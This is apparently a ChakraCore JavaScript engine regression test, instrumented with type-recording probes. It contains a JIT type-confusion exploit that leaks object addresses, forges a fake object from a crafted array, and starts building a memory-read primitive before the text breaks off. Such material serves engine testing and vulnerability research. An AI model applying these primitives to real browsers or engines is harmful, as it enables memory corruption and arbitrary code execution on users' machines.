var Inst0 = 0;
var Inst1 = 0;
var Inst2 = 0;
var Inst3 = 0;
var Inst4 = 0;
var Inst5 = 0;
var Inst6 = 0;
var Inst7 = 0;
var Inst8 = 0;
var Inst9 = 0;
var Inst10 = 0;
var Inst11 = 0;
var Inst12 = 0;
var Inst13 = 0;
var Inst14 = 0;
var Inst15 = 0;
var Inst16 = 0;
var Inst17 = 0;
var Inst18 = 0;
var Inst19 = 0;
var Inst20 = 0;
var Inst21 = 0;
var Inst22 = 0;
var Inst23 = 0;
var Inst24 = 0;
var Inst25 = 0;
var Inst26 = 0;
var Inst27 = 0;
var Inst28 = 0;
var Inst29 = 0;
var Inst30 = 0;
var Inst31 = 0;
var Inst32 = 0;
var Inst33 = 0;
var Inst34 = 0;
var Inst35 = 0;
var Inst36 = 0;
var Inst37 = 0;
var Inst38 = 0;
var Inst39 = 0;
var Inst40 = 0;
var Inst41 = 0;
var Inst42 = 0;
var Inst43 = 0;
var Inst44 = 0;
var Inst45 = 0;
var Inst46 = 0;
var Inst47 = 0;
var Inst48 = 0;
var Inst49 = 0;
var Inst50 = 0;
var Inst51 = 0;
var Inst52 = 0;
var Inst53 = 0;
var Inst54 = 0;
var Inst55 = 0;
var Inst56 = 0;
var Inst57 = 0;
var Inst58 = 0;
var Inst59 = 0;
var Inst60 = 0;
var Inst61 = 0;
var Inst62 = 0;
var Inst63 = 0;
var Inst64 = 0;
var Inst65 = 0;
var Inst66 = 0;
var Inst67 = 0;
var Inst68 = 0;
var Inst69 = 0;
var Inst70 = 0;
var Inst71 = 0;
var Inst72 = 0;
var Inst73 = 0;
var Inst74 = 0;
var Inst75 = 0;
var Inst76 = 0;
var Inst77 = 0;
var Inst78 = 0;
var Inst79 = 0;
var Inst80 = 0;
var Inst81 = 0;
var Inst82 = 0;
var Inst83 = 0;
var Inst84 = 0;
var Inst85 = 0;
var Inst86 = 0;
var Inst87 = 0;
var Inst88 = 0;
var Inst89 = 0;
var Inst90 = 0;
var Inst91 = 0;
var Inst92 = 0;
var Inst93 = 0;
var Inst94 = 0;
var Inst95 = 0;
var Inst96 = 0;
var Inst97 = 0;
var Inst98 = 0;
var Inst99 = 0;
var Inst100 = 0;
var Inst101 = 0;
var Inst102 = 0;
var Inst103 = 0;
var Inst104 = 0;
var Inst105 = 0;
var Inst106 = 0;
var Inst107 = 0;
var Inst108 = 0;
var Inst109 = 0;
var Inst110 = 0;
var Inst111 = 0;
var Inst112 = 0;
var Inst113 = 0;
var Inst114 = 0;
var Inst115 = 0;
var Inst116 = 0;
var Inst117 = 0;
var Inst118 = 0;
var Inst119 = 0;
var Inst120 = 0;
var Inst121 = 0;
var Inst122 = 0;
var Inst123 = 0;
var Inst124 = 0;
var Inst125 = 0;
var Inst126 = 0;
var Inst127 = 0;
var Inst128 = 0;
var Inst129 = 0;
var Inst130 = 0;
var Inst131 = 0;
var Inst132 = 0;
var Inst133 = 0;
var Inst134 = 0;
var Inst135 = 0;
var Inst136 = 0;
var Inst137 = 0;
var Inst138 = 0;
var Inst139 = 0;
var Inst140 = 0;
var Inst141 = 0;
var Inst142 = 0;
var Inst143 = 0;
var Inst144 = 0;
var Inst145 = 0;
var Inst146 = 0;
var Inst147 = 0;
var Inst148 = 0;
var Inst149 = 0;
var Inst150 = 0;
var Inst151 = 0;
var Inst152 = 0;
var Inst153 = 0;
var Inst154 = 0;
var Inst155 = 0;
var Inst156 = 0;
var Inst157 = 0;
var Inst158 = 0;
var Inst159 = 0;
var Inst160 = 0;
var Inst161 = 0;
var Inst162 = 0;
var Inst163 = 0;
var Inst164 = 0;
var Inst165 = 0;
var Inst166 = 0;
var Inst167 = 0;
var Inst168 = 0;
var Inst169 = 0;
var Inst170 = 0;
var Inst171 = 0;
var Inst172 = 0;
var Inst173 = 0;
var Inst174 = 0;
var Inst175 = 0;
var Inst176 = 0;
var Inst177 = 0;
var Inst178 = 0;
var Inst179 = 0;
var Inst180 = 0;
var Inst181 = 0;
var Inst182 = 0;
var Inst183 = 0;
var Inst184 = 0;
var Inst185 = 0;
var Inst186 = 0;
var Inst187 = 0;
var Inst188 = 0;
var Inst189 = 0;
var Inst190 = 0;
var Inst191 = 0;
var Inst192 = 0;
var Inst193 = 0;
var Inst194 = 0;
var Inst195 = 0;
var Inst196 = 0;
var Inst197 = 0;
var Inst198 = 0;
var Inst199 = 0;
var Inst200 = 0;
var Inst201 = 0;
var Inst202 = 0;
var Inst203 = 0;
var Inst204 = 0;
var Inst205 = 0;
var Inst206 = 0;
 
function _TypeOfArray(a) {
	let number = true;	
	let string = true;
	for (let i = 0; i < a.length; i++) {
		if (number && (typeof a[i]) != "number") {
			number = false;	
		}
		if (string && (typeof a[i]) != "string") {
			string = false;	
		}
		if (!number && !string)
			break;
	}
	if (number)
		return "number";
	else if (string)
		return "string";
	else
		return "any";
}

function _TypeIsEqual(t1, t2) {
	return JSON.stringify(t1) === JSON.stringify(t2);
}

function _TypeOf(a, step) {
	var t;
	var type = Object.prototype.toString.call(a).slice(8, -1).toLowerCase();	
	if (type == "array") {
		t = {type : type, extra: {elemType: _TypeOfArray(a)}};
	} else if (type == "object") {
		let shape = [];
        if (step === undefined || step > 0) {
            let keys = Object.keys(a);
            let length = Math.min(100, keys.length);
		    for (let i = 0; i < length; i++) {
			    shape.push([keys[i], _TypeOf(a[keys[i]], step === undefined ? 1 : step - 1)]);	
		    }
        }
		t = {type : type, extra: {shape: shape}};
	} else {
		t = {type : type};
	} 
	return t;
}

function _RecordType(loc, a) {
	var t = _TypeOf(a);
    print("~~~TypeInfo:" + loc + ":" + JSON.stringify(t));
}
//-------------------------------------------------------------------------------------------------------
// Copyright (C) Microsoft Corporation and contributors. All rights reserved.
// Licensed under the MIT license. See LICENSE.txt file in the project root for full license information.
//-------------------------------------------------------------------------------------------------------
try { if (Inst0 <= 1000 && typeof (go) != "undefined") {_RecordType("<405,407,5>",(go)); Inst0++; } } catch(e) {}
function go() {
  a1 = [1.1, 2.2];
try { if (Inst1 <= 1000 && typeof (a1) != "undefined") {_RecordType("<414,416,6>",(a1)); Inst1++; } } catch(e) {}
  a2 = [1.1, 2.2];
try { if (Inst2 <= 1000 && typeof (a2) != "undefined") {_RecordType("<433,435,7>",(a2)); Inst2++; } } catch(e) {}
try { if (Inst4 <= 1000 && typeof (ArrayBuffer) != "undefined") {_RecordType("<461,472,8>",(ArrayBuffer)); Inst4++; } } catch(e) {}
  ab = new ArrayBuffer(4);
try { if (Inst3 <= 1000 && typeof (ab) != "undefined") {_RecordType("<452,454,8>",(ab)); Inst3++; } } catch(e) {}
try { if (Inst6 <= 1000 && typeof (Uint8ClampedArray) != "undefined") {_RecordType("<490,507,9>",(Uint8ClampedArray)); Inst6++; } } catch(e) {}try { if (Inst7 <= 1000 && typeof (ab) != "undefined") {_RecordType("<508,510,9>",(ab)); Inst7++; } } catch(e) {}
  tarr = new Uint8ClampedArray(ab);
try { if (Inst5 <= 1000 && typeof (tarr) != "undefined") {_RecordType("<479,483,9>",(tarr)); Inst5++; } } catch(e) {}
  fakeaddr = 0xaaaabbbbbbbb * 4.9406564584124654E-324;
try { if (Inst8 <= 1000 && typeof (fakeaddr) != "undefined") {_RecordType("<515,523,10>",(fakeaddr)); Inst8++; } } catch(e) {}

try { if (Inst9 <= 1000 && typeof (aaa) != "undefined") {_RecordType("<580,583,12>",(aaa)); Inst9++; } } catch(e) {}
  function aaa(p1, p2, ii) {
try { if (Inst10 <= 1000 && typeof (p1) != "undefined") {_RecordType("<584,586,12>",(p1)); Inst10++; } } catch(e) {}try { if (Inst11 <= 1000 && typeof (p2) != "undefined") {_RecordType("<588,590,12>",(p2)); Inst11++; } } catch(e) {}try { if (Inst12 <= 1000 && typeof (ii) != "undefined") {_RecordType("<592,594,12>",(ii)); Inst12++; } } catch(e) {}
    p1[0] = 1.1;
try { if (Inst13 <= 1000 && typeof (p1[0]) != "undefined") {_RecordType("<602,607,13>",(p1[0])); Inst13++; } } catch(e) {}try { if (Inst14 <= 1000 && typeof (p1) != "undefined") {_RecordType("<602,604,13>",(p1)); Inst14++; } } catch(e) {}
    p1[1] = 2.2;
try { if (Inst15 <= 1000 && typeof (p1[1]) != "undefined") {_RecordType("<619,624,14>",(p1[1])); Inst15++; } } catch(e) {}try { if (Inst16 <= 1000 && typeof (p1) != "undefined") {_RecordType("<619,621,14>",(p1)); Inst16++; } } catch(e) {}
try { if (Inst19 <= 1000 && typeof (ii) != "undefined") {_RecordType("<644,646,15>",(ii)); Inst19++; } } catch(e) {}
    p2[0] = ii;
try { if (Inst17 <= 1000 && typeof (p2[0]) != "undefined") {_RecordType("<636,641,15>",(p2[0])); Inst17++; } } catch(e) {}try { if (Inst18 <= 1000 && typeof (p2) != "undefined") {_RecordType("<636,638,15>",(p2)); Inst18++; } } catch(e) {}
try { if (Inst22 <= 1000 && typeof (fakeaddr) != "undefined") {_RecordType("<660,668,16>",(fakeaddr)); Inst22++; } } catch(e) {}
    p1[0] = fakeaddr;
try { if (Inst20 <= 1000 && typeof (p1[0]) != "undefined") {_RecordType("<652,657,16>",(p1[0])); Inst20++; } } catch(e) {}try { if (Inst21 <= 1000 && typeof (p1) != "undefined") {_RecordType("<652,654,16>",(p1)); Inst21++; } } catch(e) {}
try { if (Inst23 <= 1000 && typeof (ii) != "undefined") {_RecordType("<681,683,17>",(ii)); Inst23++; } } catch(e) {}
    return ii;
  }

try { if (Inst24 <= 1000 && typeof (bbb) != "undefined") {_RecordType("<701,704,20>",(bbb)); Inst24++; } } catch(e) {}
  function bbb(p1, p2, ii) {
try { if (Inst25 <= 1000 && typeof (p1) != "undefined") {_RecordType("<705,707,20>",(p1)); Inst25++; } } catch(e) {}try { if (Inst26 <= 1000 && typeof (p2) != "undefined") {_RecordType("<709,711,20>",(p2)); Inst26++; } } catch(e) {}try { if (Inst27 <= 1000 && typeof (ii) != "undefined") {_RecordType("<713,715,20>",(ii)); Inst27++; } } catch(e) {}
    p1[0] = 1.1;
try { if (Inst28 <= 1000 && typeof (p1[0]) != "undefined") {_RecordType("<723,728,21>",(p1[0])); Inst28++; } } catch(e) {}try { if (Inst29 <= 1000 && typeof (p1) != "undefined") {_RecordType("<723,725,21>",(p1)); Inst29++; } } catch(e) {}
    p1[1] = 2.2;
try { if (Inst30 <= 1000 && typeof (p1[1]) != "undefined") {_RecordType("<740,745,22>",(p1[1])); Inst30++; } } catch(e) {}try { if (Inst31 <= 1000 && typeof (p1) != "undefined") {_RecordType("<740,742,22>",(p1)); Inst31++; } } catch(e) {}
try { if (Inst34 <= 1000 && typeof (ii) != "undefined") {_RecordType("<765,767,23>",(ii)); Inst34++; } } catch(e) {}
    p2[0] = ii;
try { if (Inst32 <= 1000 && typeof (p2[0]) != "undefined") {_RecordType("<757,762,23>",(p2[0])); Inst32++; } } catch(e) {}try { if (Inst33 <= 1000 && typeof (p2) != "undefined") {_RecordType("<757,759,23>",(p2)); Inst33++; } } catch(e) {}
try { if (Inst35 <= 1000 && typeof (p1[0]) != "undefined") {_RecordType("<780,785,24>",(p1[0])); Inst35++; } } catch(e) {}try { if (Inst36 <= 1000 && typeof (p1) != "undefined") {_RecordType("<780,782,24>",(p1)); Inst36++; } } catch(e) {}
    return p1[0];
  }

  for (var i = 0; i < 0x100000; i++) {
try { if (Inst37 <= 1000 && typeof (i) != "undefined") {_RecordType("<803,804,27>",(i)); Inst37++; } } catch(e) {}try { if (Inst38 <= 1000 && typeof (i) != "undefined") {_RecordType("<810,811,27>",(i)); Inst38++; } } catch(e) {}try { if (Inst39 <= 1000 && typeof (i) != "undefined") {_RecordType("<824,825,27>",(i)); Inst39++; } } catch(e) {}
try { if (Inst40 <= 1000 && typeof (aaa) != "undefined") {_RecordType("<835,838,28>",(aaa)); Inst40++; } } catch(e) {}try { if (Inst41 <= 1000 && typeof (a1) != "undefined") {_RecordType("<839,841,28>",(a1)); Inst41++; } } catch(e) {}try { if (Inst42 <= 1000 && typeof (tarr) != "undefined") {_RecordType("<843,847,28>",(tarr)); Inst42++; } } catch(e) {}
    aaa(a1, tarr, 3);
  }

  for (var i = 0; i < 0x100000; i++) {
try { if (Inst43 <= 1000 && typeof (i) != "undefined") {_RecordType("<869,870,31>",(i)); Inst43++; } } catch(e) {}try { if (Inst44 <= 1000 && typeof (i) != "undefined") {_RecordType("<876,877,31>",(i)); Inst44++; } } catch(e) {}try { if (Inst45 <= 1000 && typeof (i) != "undefined") {_RecordType("<890,891,31>",(i)); Inst45++; } } catch(e) {}
try { if (Inst46 <= 1000 && typeof (bbb) != "undefined") {_RecordType("<901,904,32>",(bbb)); Inst46++; } } catch(e) {}try { if (Inst47 <= 1000 && typeof (a2) != "undefined") {_RecordType("<905,907,32>",(a2)); Inst47++; } } catch(e) {}try { if (Inst48 <= 1000 && typeof (tarr) != "undefined") {_RecordType("<909,913,32>",(tarr)); Inst48++; } } catch(e) {}
    bbb(a2, tarr, 3);
  }

try { if (Inst50 <= 1000 && typeof (Array) != "undefined") {_RecordType("<940,945,35>",(Array)); Inst50++; } } catch(e) {}
  var arr = new Array(0x11111111, 0x11111111, 0x11111111, 0x11111111, 0x11111111, 0x11111111, 0x11111111, 0x11111111, 0x11111111, 0x11111111, 0x11111111, 0x11111111, 0x11111111, 0x11111111, 0x11111111);
try { if (Inst49 <= 1000 && typeof (arr) != "undefined") {_RecordType("<930,933,35>",(arr)); Inst49++; } } catch(e) {}
try { if (Inst52 <= 1000 && typeof (ArrayBuffer) != "undefined") {_RecordType("<1138,1149,36>",(ArrayBuffer)); Inst52++; } } catch(e) {}
  ab = new ArrayBuffer(0x100);
try { if (Inst51 <= 1000 && typeof (ab) != "undefined") {_RecordType("<1129,1131,36>",(ab)); Inst51++; } } catch(e) {}
try { if (Inst54 <= 1000 && typeof (Float64Array) != "undefined") {_RecordType("<1175,1187,37>",(Float64Array)); Inst54++; } } catch(e) {}try { if (Inst55 <= 1000 && typeof (ab) != "undefined") {_RecordType("<1188,1190,37>",(ab)); Inst55++; } } catch(e) {}
  var farr = new Float64Array(ab);
try { if (Inst53 <= 1000 && typeof (farr) != "undefined") {_RecordType("<1164,1168,37>",(farr)); Inst53++; } } catch(e) {}
try { if (Inst57 <= 1000 && typeof (Uint32Array) != "undefined") {_RecordType("<1210,1221,38>",(Uint32Array)); Inst57++; } } catch(e) {}try { if (Inst58 <= 1000 && typeof (ab) != "undefined") {_RecordType("<1222,1224,38>",(ab)); Inst58++; } } catch(e) {}
  var uarr = new Uint32Array(ab);
try { if (Inst56 <= 1000 && typeof (uarr) != "undefined") {_RecordType("<1199,1203,38>",(uarr)); Inst56++; } } catch(e) {}
try { if (Inst61 <= 1000 && typeof (bbb) != "undefined") {_RecordType("<1239,1242,39>",(bbb)); Inst61++; } } catch(e) {}try { if (Inst62 <= 1000 && typeof (a2) != "undefined") {_RecordType("<1243,1245,39>",(a2)); Inst62++; } } catch(e) {}try { if (Inst63 <= 1000 && typeof (tarr) != "undefined") {_RecordType("<1247,1251,39>",(tarr)); Inst63++; } } catch(e) {}
  farr[0] = bbb(a2, tarr, {
    toString: function () {
try { if (Inst66 <= 1000 && typeof (arr) != "undefined") {_RecordType("<1297,1300,41>",(arr)); Inst66++; } } catch(e) {}
      a2[0] = arr;
try { if (Inst64 <= 1000 && typeof (a2[0]) != "undefined") {_RecordType("<1289,1294,41>",(a2[0])); Inst64++; } } catch(e) {}try { if (Inst65 <= 1000 && typeof (a2) != "undefined") {_RecordType("<1289,1291,41>",(a2)); Inst65++; } } catch(e) {}
      return 9;
    }
  });
try { if (Inst59 <= 1000 && typeof (farr[0]) != "undefined") {_RecordType("<1229,1236,39>",(farr[0])); Inst59++; } } catch(e) {}try { if (Inst60 <= 1000 && typeof (farr) != "undefined") {_RecordType("<1229,1233,39>",(farr)); Inst60++; } } catch(e) {}
try { if (Inst68 <= 1000 && typeof (uarr[1]) != "undefined") {_RecordType("<1347,1354,45>",(uarr[1])); Inst68++; } } catch(e) {}try { if (Inst69 <= 1000 && typeof (uarr) != "undefined") {_RecordType("<1347,1351,45>",(uarr)); Inst69++; } } catch(e) {}try { if (Inst70 <= 1000 && typeof (uarr[0]) != "undefined") {_RecordType("<1371,1378,45>",(uarr[0])); Inst70++; } } catch(e) {}try { if (Inst71 <= 1000 && typeof (uarr) != "undefined") {_RecordType("<1371,1375,45>",(uarr)); Inst71++; } } catch(e) {}
  var leakaddr = uarr[1] * 0x100000000 + uarr[0];
try { if (Inst67 <= 1000 && typeof (leakaddr) != "undefined") {_RecordType("<1336,1344,45>",(leakaddr)); Inst67++; } } catch(e) {}
try { if (Inst73 <= 1000 && typeof (leakaddr) != "undefined") {_RecordType("<1394,1402,46>",(leakaddr)); Inst73++; } } catch(e) {}
  fakeaddr = (leakaddr + 0x58) * 4.9406564584124654E-324;
try { if (Inst72 <= 1000 && typeof (fakeaddr) != "undefined") {_RecordType("<1382,1390,46>",(fakeaddr)); Inst72++; } } catch(e) {}
try { if (Inst74 <= 1000 && typeof (aaa) != "undefined") {_RecordType("<1440,1443,47>",(aaa)); Inst74++; } } catch(e) {}try { if (Inst75 <= 1000 && typeof (a1) != "undefined") {_RecordType("<1444,1446,47>",(a1)); Inst75++; } } catch(e) {}try { if (Inst76 <= 1000 && typeof (tarr) != "undefined") {_RecordType("<1448,1452,47>",(tarr)); Inst76++; } } catch(e) {}
  aaa(a1, tarr, {
    toString: function () {
      a1[0] = {};
try { if (Inst77 <= 1000 && typeof (a1[0]) != "undefined") {_RecordType("<1490,1495,49>",(a1[0])); Inst77++; } } catch(e) {}try { if (Inst78 <= 1000 && typeof (a1) != "undefined") {_RecordType("<1490,1492,49>",(a1)); Inst78++; } } catch(e) {}
      return 9;
    }
  });
try { if (Inst80 <= 1000 && typeof (leakaddr) != "undefined") {_RecordType("<1545,1553,53>",(leakaddr)); Inst80++; } } catch(e) {}
  typeidaddr = leakaddr + 0x58;
try { if (Inst79 <= 1000 && typeof (typeidaddr) != "undefined") {_RecordType("<1532,1542,53>",(typeidaddr)); Inst79++; } } catch(e) {}
try { if (Inst82 <= 1000 && typeof (leakaddr) != "undefined") {_RecordType("<1573,1581,54>",(leakaddr)); Inst82++; } } catch(e) {}
  abaddr = leakaddr + 0x2c;
try { if (Inst81 <= 1000 && typeof (abaddr) != "undefined") {_RecordType("<1564,1570,54>",(abaddr)); Inst81++; } } catch(e) {}

try { if (Inst83 <= 1000 && typeof (low32) != "undefined") {_RecordType("<1602,1607,56>",(low32)); Inst83++; } } catch(e) {}
  function low32(v) {
try { if (Inst84 <= 1000 && typeof (v) != "undefined") {_RecordType("<1608,1609,56>",(v)); Inst84++; } } catch(e) {}
try { if (Inst85 <= 1000 && typeof (v) != "undefined") {_RecordType("<1624,1625,57>",(v)); Inst85++; } } catch(e) {}
    return v % 0x100000000;
  }

try { if (Inst86 <= 1000 && typeof (high32) != "undefined") {_RecordType("<1657,1663,60>",(high32)); Inst86++; } } catch(e) {}
  function high32(v) {
try { if (Inst87 <= 1000 && typeof (v) != "undefined") {_RecordType("<1664,1665,60>",(v)); Inst87++; } } catch(e) {}
try { if (Inst88 <= 1000 && typeof (Math.floor) != "undefined") {_RecordType("<1680,1690,61>",(Math.floor)); Inst88++; } } catch(e) {}try { if (Inst89 <= 1000 && typeof (Math) != "undefined") {_RecordType("<1680,1684,61>",(Math)); Inst89++; } } catch(e) {}try { if (Inst90 <= 1000 && typeof (v) != "undefined") {_RecordType("<1691,1692,61>",(v)); Inst90++; } } catch(e) {}
    return Math.floor(v / 0x100000000);
  }

try { if (Inst91 <= 1000 && typeof (toInt) != "undefined") {_RecordType("<1725,1730,64>",(toInt)); Inst91++; } } catch(e) {}
  function toInt(v) {
try { if (Inst92 <= 1000 && typeof (v) != "undefined") {_RecordType("<1731,1732,64>",(v)); Inst92++; } } catch(e) {}
try { if (Inst93 <= 1000 && typeof (v) != "undefined") {_RecordType("<1747,1748,65>",(v)); Inst93++; } } catch(e) {}try { if (Inst94 <= 1000 && typeof (v) != "undefined") {_RecordType("<1764,1765,65>",(v)); Inst94++; } } catch(e) {}try { if (Inst95 <= 1000 && typeof (v) != "undefined") {_RecordType("<1784,1785,65>",(v)); Inst95++; } } catch(e) {}
    return v < 0x80000000 ? v : -(0x100000000 - v);
  }

try { if (Inst96 <= 1000 && typeof (toUint) != "undefined") {_RecordType("<1804,1810,68>",(toUint)); Inst96++; } } catch(e) {}
  function toUint(v) {
try { if (Inst97 <= 1000 && typeof (v) != "undefined") {_RecordType("<1811,1812,68>",(v)); Inst97++; } } catch(e) {}
try { if (Inst98 <= 1000 && typeof (v) != "undefined") {_RecordType("<1827,1828,69>",(v)); Inst98++; } } catch(e) {}try { if (Inst99 <= 1000 && typeof (v) != "undefined") {_RecordType("<1836,1837,69>",(v)); Inst99++; } } catch(e) {}try { if (Inst100 <= 1000 && typeof (v) != "undefined") {_RecordType("<1854,1855,69>",(v)); Inst100++; } } catch(e) {}
    return v >= 0 ? v : 0x100000000 + v;
  }

  arr[0] = 56;
try { if (Inst101 <= 1000 && typeof (arr[0]) != "undefined") {_RecordType("<1864,1870,72>",(arr[0])); Inst101++; } } catch(e) {}try { if (Inst102 <= 1000 && typeof (arr) != "undefined") {_RecordType("<1864,1867,72>",(arr)); Inst102++; } } catch(e) {}
  arr[1] = 0;
try { if (Inst103 <= 1000 && typeof (arr[1]) != "undefined") {_RecordType("<1879,1885,73>",(arr[1])); Inst103++; } } catch(e) {}try { if (Inst104 <= 1000 && typeof (arr) != "undefined") {_RecordType("<1879,1882,73>",(arr)); Inst104++; } } catch(e) {}
try { if (Inst107 <= 1000 && typeof (toInt) != "undefined") {_RecordType("<1902,1907,74>",(toInt)); Inst107++; } } catch(e) {}try { if (Inst108 <= 1000 && typeof (low32) != "undefined") {_RecordType("<1908,1913,74>",(low32)); Inst108++; } } catch(e) {}try { if (Inst109 <= 1000 && typeof (typeidaddr) != "undefined") {_RecordType("<1914,1924,74>",(typeidaddr)); Inst109++; } } catch(e) {}
  arr[2] = toInt(low32(typeidaddr));
try { if (Inst105 <= 1000 && typeof (arr[2]) != "undefined") {_RecordType("<1893,1899,74>",(arr[2])); Inst105++; } } catch(e) {}try { if (Inst106 <= 1000 && typeof (arr) != "undefined") {_RecordType("<1893,1896,74>",(arr)); Inst106++; } } catch(e) {}
try { if (Inst112 <= 1000 && typeof (toInt) != "undefined") {_RecordType("<1939,1944,75>",(toInt)); Inst112++; } } catch(e) {}try { if (Inst113 <= 1000 && typeof (high32) != "undefined") {_RecordType("<1945,1951,75>",(high32)); Inst113++; } } catch(e) {}try { if (Inst114 <= 1000 && typeof (typeidaddr) != "undefined") {_RecordType("<1952,1962,75>",(typeidaddr)); Inst114++; } } catch(e) {}
  arr[3] = toInt(high32(typeidaddr));
try { if (Inst110 <= 1000 && typeof (arr[3]) != "undefined") {_RecordType("<1930,1936,75>",(arr[3])); Inst110++; } } catch(e) {}try { if (Inst111 <= 1000 && typeof (arr) != "undefined") {_RecordType("<1930,1933,75>",(arr)); Inst111++; } } catch(e) {}
  arr[4] = 0;
try { if (Inst115 <= 1000 && typeof (arr[4]) != "undefined") {_RecordType("<1968,1974,76>",(arr[4])); Inst115++; } } catch(e) {}try { if (Inst116 <= 1000 && typeof (arr) != "undefined") {_RecordType("<1968,1971,76>",(arr)); Inst116++; } } catch(e) {}
  arr[5] = 0;
try { if (Inst117 <= 1000 && typeof (arr[5]) != "undefined") {_RecordType("<1982,1988,77>",(arr[5])); Inst117++; } } catch(e) {}try { if (Inst118 <= 1000 && typeof (arr) != "undefined") {_RecordType("<1982,1985,77>",(arr)); Inst118++; } } catch(e) {}
  arr[6] = 0;
try { if (Inst119 <= 1000 && typeof (arr[6]) != "undefined") {_RecordType("<1996,2002,78>",(arr[6])); Inst119++; } } catch(e) {}try { if (Inst120 <= 1000 && typeof (arr) != "undefined") {_RecordType("<1996,1999,78>",(arr)); Inst120++; } } catch(e) {}
  arr[7] = 0;
try { if (Inst121 <= 1000 && typeof (arr[7]) != "undefined") {_RecordType("<2010,2016,79>",(arr[7])); Inst121++; } } catch(e) {}try { if (Inst122 <= 1000 && typeof (arr) != "undefined") {_RecordType("<2010,2013,79>",(arr)); Inst122++; } } catch(e) {}
  arr[8] = 0xabcd;
try { if (Inst123 <= 1000 && typeof (arr[8]) != "undefined") {_RecordType("<2024,2030,80>",(arr[8])); Inst123++; } } catch(e) {}try { if (Inst124 <= 1000 && typeof (arr) != "undefined") {_RecordType("<2024,2027,80>",(arr)); Inst124++; } } catch(e) {}
  arr[9] = 0;
try { if (Inst125 <= 1000 && typeof (arr[9]) != "undefined") {_RecordType("<2043,2049,81>",(arr[9])); Inst125++; } } catch(e) {}try { if (Inst126 <= 1000 && typeof (arr) != "undefined") {_RecordType("<2043,2046,81>",(arr)); Inst126++; } } catch(e) {}
try { if (Inst129 <= 1000 && typeof (toInt) != "undefined") {_RecordType("<2067,2072,82>",(toInt)); Inst129++; } } catch(e) {}try { if (Inst130 <= 1000 && typeof (low32) != "undefined") {_RecordType("<2073,2078,82>",(low32)); Inst130++; } } catch(e) {}try { if (Inst131 <= 1000 && typeof (abaddr) != "undefined") {_RecordType("<2079,2085,82>",(abaddr)); Inst131++; } } catch(e) {}
  arr[10] = toInt(low32(abaddr));
try { if (Inst127 <= 1000 && typeof (arr[10]) != "undefined") {_RecordType("<2057,2064,82>",(arr[10])); Inst127++; } } catch(e) {}try { if (Inst128 <= 1000 && typeof (arr) != "undefined") {_RecordType("<2057,2060,82>",(arr)); Inst128++; } } catch(e) {}
try { if (Inst134 <= 1000 && typeof (toInt) != "undefined") {_RecordType("<2101,2106,83>",(toInt)); Inst134++; } } catch(e) {}try { if (Inst135 <= 1000 && typeof (high32) != "undefined") {_RecordType("<2107,2113,83>",(high32)); Inst135++; } } catch(e) {}try { if (Inst136 <= 1000 && typeof (abaddr) != "undefined") {_RecordType("<2114,2120,83>",(abaddr)); Inst136++; } } catch(e) {}
  arr[11] = toInt(high32(abaddr));
try { if (Inst132 <= 1000 && typeof (arr[11]) != "undefined") {_RecordType("<2091,2098,83>",(arr[11])); Inst132++; } } catch(e) {}try { if (Inst133 <= 1000 && typeof (arr) != "undefined") {_RecordType("<2091,2094,83>",(arr)); Inst133++; } } catch(e) {}
  arr[12] = 0;
try { if (Inst137 <= 1000 && typeof (arr[12]) != "undefined") {_RecordType("<2126,2133,84>",(arr[12])); Inst137++; } } catch(e) {}try { if (Inst138 <= 1000 && typeof (arr) != "undefined") {_RecordType("<2126,2129,84>",(arr)); Inst138++; } } catch(e) {}
  arr[13] = 0;
try { if (Inst139 <= 1000 && typeof (arr[13]) != "undefined") {_RecordType("<2141,2148,85>",(arr[13])); Inst139++; } } catch(e) {}try { if (Inst140 <= 1000 && typeof (arr) != "undefined") {_RecordType("<2141,2144,85>",(arr)); Inst140++; } } catch(e) {}
  arr[14] = 0x41414141;
try { if (Inst141 <= 1000 && typeof (arr[14]) != "undefined") {_RecordType("<2156,2163,86>",(arr[14])); Inst141++; } } catch(e) {}try { if (Inst142 <= 1000 && typeof (arr) != "undefined") {_RecordType("<2156,2159,86>",(arr)); Inst142++; } } catch(e) {}
  arr[15] = 0x41414141;
try { if (Inst143 <= 1000 && typeof (arr[15]) != "undefined") {_RecordType("<2180,2187,87>",(arr[15])); Inst143++; } } catch(e) {}try { if (Inst144 <= 1000 && typeof (arr) != "undefined") {_RecordType("<2180,2183,87>",(arr)); Inst144++; } } catch(e) {}
  arr[16] = 0;
try { if (Inst145 <= 1000 && typeof (arr[16]) != "undefined") {_RecordType("<2204,2211,88>",(arr[16])); Inst145++; } } catch(e) {}try { if (Inst146 <= 1000 && typeof (arr) != "undefined") {_RecordType("<2204,2207,88>",(arr)); Inst146++; } } catch(e) {}
  arr[17] = 0;
try { if (Inst147 <= 1000 && typeof (arr[17]) != "undefined") {_RecordType("<2219,2226,89>",(arr[17])); Inst147++; } } catch(e) {}try { if (Inst148 <= 1000 && typeof (arr) != "undefined") {_RecordType("<2219,2222,89>",(arr)); Inst148++; } } catch(e) {}
try { if (Inst150 <= 1000 && typeof (a1[0]) != "undefined") {_RecordType("<2244,2249,90>",(a1[0])); Inst150++; } } catch(e) {}try { if (Inst151 <= 1000 && typeof (a1) != "undefined") {_RecordType("<2244,2246,90>",(a1)); Inst151++; } } catch(e) {}
  fakeobj = a1[0];
try { if (Inst149 <= 1000 && typeof (fakeobj) != "undefined") {_RecordType("<2234,2241,90>",(fakeobj)); Inst149++; } } catch(e) {}

  var read32 = function (addr) {
try { if (Inst153 <= 1000 && typeof (addr) != "undefined") {_RecordType("<2277,2281,92>",(addr)); Inst153++; } } catch(e) {}
try { if (Inst156 <= 1000 && typeof (toInt) != "undefined") {_RecordType("<2299,2304,93>",(toInt)); Inst156++; } } catch(e) {}try { if (Inst157 <= 1000 && typeof (low32) != "undefined") {_RecordType("<2305,2310,93>",(low32)); Inst157++; } } catch(e) {}try { if (Inst158 <= 1000 && typeof (addr) != "undefined") {_RecordType("<2311,2315,93>",(addr)); Inst158++; } } catch(e) {}
    arr[14] = toInt(low32(addr));
try { if (Inst154 <= 1000 && typeof (arr[14]) != "undefined") {_RecordType("<2289,2296,93>",(arr[14])); Inst154++; } } catch(e) {}try { if (Inst155 <= 1000 && typeof (arr) != "undefined") {_RecordType("<2289,2292,93>",(arr)); Inst155++; } } catch(e) {}
try { if (Inst161 <= 1000 && typeof (toInt) != "undefined") {_RecordType("<2333,2338,94>",(toInt)); Inst161++; } } catch(e) {}try { if (Inst162 <= 1000 && typeof (high32) != "undefined") {_RecordType("<2339,2345,94>",(high32)); Inst162++; } } catch(e) {}try { if (Inst163 <= 1000 && typeof (addr) != "undefined") {_RecordType("<2346,2350,94>",(addr)); Inst163++; } } catch(e) {}
